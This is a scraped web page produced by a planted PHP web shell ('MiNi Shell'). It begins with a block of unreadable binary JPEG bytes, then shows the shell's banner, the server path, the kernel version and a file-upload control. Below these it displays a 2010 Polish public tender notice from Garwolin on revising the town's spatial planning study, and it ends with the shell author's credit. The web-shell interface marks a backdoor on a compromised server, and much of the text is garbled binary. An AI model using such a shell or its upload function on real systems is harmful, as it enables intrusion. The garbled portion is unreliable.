JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100326/67031-N-2010.html

<p class="kh_header"><b>Garwolin: Opracowanie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta Garwolin</b><br>
<b>Numer ogłoszenia: 67031 - 2010; data zamieszczenia: 26.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Garwolin , ul. Staszica 15, 08-400 Garwolin, woj. mazowieckie, tel. 025 7864242, 6843423, faks 025 684 34 66.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.garwolin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta Garwolin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Garwolin  (zwanej dalej zmianą studium), wynikające z ustawy z dnia 27 marca 2003r.
o planowaniu i zagospodarowaniu przestrzennym (zwanej dalej ustawą), a w szczególności:
     etap  I zadania 
1.	Wykonania analizy poprawności wytypowania instytucji i organów właściwych do uzgadniania
i opiniowania projektu studium, zawiadomionych o przystąpieniu do sporządzenia zmiany studium. 
2.1.Wykonania wykazu wniosków złożonych na podstawie art.11 pkt.1 ustawy.
2.2.Wykonania projektu rozstrzygnięcia Burmistrza Miasta Garwolin w sprawie rozpatrzenia
wniosków, o których mowa w art. 11 pkt 1 ustawy.
     etap  II zadania 
3.	Wykonania kopii mapy, o której mowa w § 5 ust.1 Rozporządzenia Ministra Infrastruktury
z dnia 28 kwietnia 2004r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (zwanego dalej rozporządzeniem).
4.	Wykonania materiałów planistycznych, o których mowa w  § 3 ust. 1 rozporządzenia, wraz z:
    - wykazem  materiałów planistycznych,
    - wnioskami wynikającymi z analizy  materiałów planistycznych.
5.1.Wykonania materiałów planistycznych, o których mowa w  § 3 ust. 2 rozporządzenia, wraz
z wykazem  materiałów planistycznych.
5.2.Wykonania opracowania ekofizjograficznego obejmującego cały obszar miasta Garwolin.
6.1. Sporządzenia wstępnej koncepcji projektu zmiany studium do konsultacji z Urzędem Miasta Garwolin oraz Komisją Budżetu i Rozwoju Gospodarczego Rady Miasta Garwolin. 
6.2.Prezentacji wstępnej koncepcji projektu zmiany studium w trakcie posiedzenia Komisji Budżetu i Rozwoju Gospodarczego Rady Miasta Garwolin. 
6.3.Prezentacji wstępnej koncepcji projektu zmiany studium w trakcie spotkania
z mieszkańcami miasta oraz innymi zainteresowanymi osobami, bądź instytucjami/organami. 
6.4.Wprowadzenia korekt do  wstępnej koncepcji projektu zmiany studium  wypracowanych
w trakcie ww prezentacji oraz wynikających z wystąpień zainteresowanych osób, bądź instytucji/organów (o ile  wystąpienia te nie kolidują z obowiązującymi przepisami prawa oraz  zasadami planowania i zagospodarowania przestrzennego).
       etap III zadania 
  7. Sporządzenia  projektu zmiany studium o zakresie określonym w Rozporządzeniu Ministra Infrastruktury z dnia 28 kwietnia 2004r. w sprawie zakresu projektu studium uwarunkowań
i kierunków zagospodarowania przestrzennego gminy, gotowego  do przeprowadzenia procedury opiniowania i uzgodnień. 
8.1.Sporządzenia projektu pisma przewodniego do Komisji Urbanistyczno-Architektonicznej (zwanej dalej KU-A), dotyczącego wystąpienia o zaopiniowanie projektu zmiany studium.
8.2.Przygotowania kompletnej dokumentacji, niezbędnej do wystąpienia do KU- A o zaopiniowanie projektu zmiany studium.
8.3.Uczestniczenia w posiedzeniach KU-A.
8.4.Wprowadzenia odpowiednich poprawek (wraz z pismem wyjaśniającym) - w sytuacji gdy KU- A wniesie uwagi do projektu zmiany studium (o ile  uwagi te nie kolidują z obowiązującymi przepisami prawa oraz zasadami planowania i zagospodarowania przestrzennego).
9.1.Sporządzenia pism przewodnich do instytucji i organów wymienionych w art.11 pkt 6-8 ustawy, właściwych do uzgadniania i opiniowania  projektu zmiany studium.
9.2.Przygotowania kompletnej dokumentacji, niezbędnej do wystąpienia o zaopiniowanie, bądź uzgodnienie projektu zmiany studium - do instytucji i organów wymienionych w art.11 pkt 6-8 ustawy.
10.1. Dokonania analizy uzyskanych opinii i uzgodnień.
10.2. Sporządzenia wykazu opinii do projektu zmiany studium.
10.3. Przybycia do Urzędu Miasta Garwolin w celu przedstawienia analizy uzyskanych opinii
i uzgodnień (wraz z pismem wyjaśniającym).
10.4.Wprowadzenia odpowiednich zmian   do projektu zmiany studium, wynikających
z uzyskanych opinii i dokonanych uzgodnień.
         etap  IV zadania 
 11.1.Sporządzenia projektu ogłoszenia prasowego i obwieszczenia o wyłożeniu projektu zmiany studium do publicznego wglądu (zgodnie z wzorem zamieszczonym w rozporządzeniu) wraz
z określeniem terminów występujących w ogłoszeniu obwieszczeniu. 
11.2.Przygotowania kompletnych materiałów niezbędnych do wyłożenia projektu zmiany studium do publicznego wglądu.
11.2.Uczestniczenia w dyskusji publicznej nad przyjętymi w projekcie zmiany studium rozwiązaniami.
11.3.Sporządzenia protokołu z dyskusji publicznej nad przyjętymi w projekcie zmiany studium rozwiązaniami (zgodnie z wzorem zamieszczonym w rozporządzeniu).
12.1.Sporządzenia wykazu uwag zgłoszonych do wyłożonego do publicznego wglądu projektu zmiany studium (zgodnie z wzorem zamieszczonym w rozporządzeniu).
12.2.Dokonania analizy  uwag  zgłoszonych do wyłożonego do publicznego wglądu projektu zmiany studium.
12.3.Sporządzenia projektu rozstrzygnięcia w sprawie rozpatrzenia uwag zgłoszonych do wyłożonego do publicznego wglądu projektu zmiany studium.
12.4.Sporządzenia projektu listy nieuwzględnionych uwag zgłoszonych do wyłożonego do publicznego wglądu projektu zmiany studium.
13.1.Wprowadzenia zmian do projektu zmiany studium,  wynikających z uwzględnienia uwag zgłoszonych do wyłożonego do publicznego wglądu projektu zmiany studium.
13.2.Określenia czynności jakie należy ponowić w związku z uwzględnieniem uwag.
13.3.Sporządzenia listy instytucji i organów,  które ponownie powinny dokonać uzgodnienia, bądź przedstawić opinie do projektu zmiany studium.
14.1.Sporządzenia projektu pism przewodnich do instytucji i organów ponownie opiniujących
i uzgadniających projekt zmiany studium.
14.2.Przygotowania kompletnej dokumentacji, niezbędnej do wystąpienia o ponowne zaopiniowanie, bądź uzgodnienie projektu zmiany studium.
14.3.Dokonania analizy ponownie uzyskanych opinii i uzgodnień.
14.4.Sporządzenia wykazu ponownie uzyskanych opinii.
14.5 Przybycia do Urzędu Miasta Garwolin w celu przedstawienia analizy ponownie uzyskanych 
         opinii i uzgodnień (wraz z pismem wyjaśniającym).
15.Wprowadzenia odpowiednich zmian  do projektu zmiany studium, wynikających z uzyskanych opinii i dokonanych uzgodnień. 
16.Przygotowania kompletnych materiałów na sesję Rady Miasta Garwolin, na której będzie uchwalany projekt zmiany studium, wraz z:
a) listą nieuwzględnionych uwag zgłoszonych do wyłożonego do publicznego wglądu projektu  zmiany studium,
b) projektem rozstrzygnięcia Rady Miasta Garwolin o sposobie rozpatrzenia nieuwzględnionych uwag.
17.Przygotowania informacji o składzie zespołu autorskiego projektu zmiany studium wraz
z aktualnymi zaświadczeniami o wpisie na listę członków właściwej izby samorządu zawodowego.
18.  Przygotowania dla wojewody kompletnej dokumentacji prac planistycznych wraz z uchwałą
(o uchwaleniu zmiany studium) i załącznikami, w celu oceny ich zgodności z przepisami prawa. 
19.  Wykonania wszystkich innych czynności i opracowań wynikających z przepisów prawa
w zakresie procedury tworzenia zmiany studium.
Zamawiający nie określa wymagań, o których mowa w art. 29 ust. 4 Ustawy
Powierzchnia Miasta Garwolin - 22,08 km2..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości - 3 000,00 zł (słownie: trzy tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia
Zamawiający uzna spełnienie w/w warunku jeżeli wykonawca wykaże (w załączniku nr 3), że
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum jedną pracę polegającą na Opracowaniu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego lub Opracowaniu studium uwarunkowań i kierunków zagospodarowania przestrzennego oraz załączy dokumenty potwierdzające należyte wykonanie opracowania (np. opinie lub referencje lub protokoły odbiorów)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia
Zamawiający uzna spełnienia w/w warunku jeżeli:
3.4.1 wykonawca wykaże (w załączniku nr 4), że dysponuje co najmniej jedną osobą /główny projektant/ będącą członkiem Izby Urbanistów, o której mowa w art. 5 ust.3 ustawy a dnia 15.12.2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów
(Dz. U. z 2001r. Nr 5 poz.42 z późn. zm.)
3.4.2. wykonawca załączy oświadczenie potwierdzające posiadanie wymaganych uprawnień - załącznik nr 5</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-	Formularz oferty - załącznik nr 1

-	W przypadku, gdy wykonawcę reprezentuje pełnomocnik, do oferty musi być dołączone pełnomocnictwo (pełnomocnictwo winno być dołączone do oferty, o ile nie wynika z innych dokumentów załączonych przez wykonawcę).

-	W przypadku składania oferty przez podmioty występujące wspólnie (konsorcjum, spółka cywilna), do oferty należy dołączyć pełnomocnictwo (pełnomocnictwo winno być dołączone do oferty, o ile nie wynika z innych dokumentów załączonych przez wykonawcę).

-	Dane dotyczące podwykonawców i zakresu powierzonych im części zamówienia na załączniku nr 6

-	Załącznik nr 7 - pisemne zobowiązanie podmiotów do oddania do dyspozycji niezbędnych zasobów</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z zapisami Rozdziału III SIWZ - Umowa Projekt</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.garwolin.pl (zakładka Przetargi, BIP)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Garwolin, 08-400 Garwolin, ul. Staszica 15 (pok. 24).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2010 godzina 11:00, miejsce: Urząd Miasta Garwolin /Sekretariat/, ul. Staszica 15, 08-400 Garwolin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com